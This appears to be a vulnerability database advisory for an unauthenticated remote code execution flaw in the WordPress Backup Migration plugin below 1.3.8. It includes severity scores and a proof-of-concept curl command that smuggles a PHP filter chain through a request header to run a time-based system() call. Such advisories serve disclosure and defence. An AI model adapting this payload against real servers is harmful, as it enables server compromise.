Backup Migration < 1.3.8 - Unauthenticated RCE

2023-12-1200:00:00

wpvulndb

backup migration

unauthenticated rce

php filter chain generator

vulnerability

exploit

curl command

github

synacktiv

time-based payload

10 High

AI Score

Confidence

High

0.935 High

EPSS

Percentile

99.1%

JSON

Description The plugin is vulnerable to Remote Code Execution via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.

Using the PHP Filter Chain Generator: https://github.com/synacktiv/php_filter_chain_generator

time curl -X POST http://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/backup-backup/includes/backup-heart.php -H "Content-Dir: `python3 ./php_filter_chain_generator.py --chain '<?php system("sleep 5"); ?>' | grep --color=never '^php://filter'`"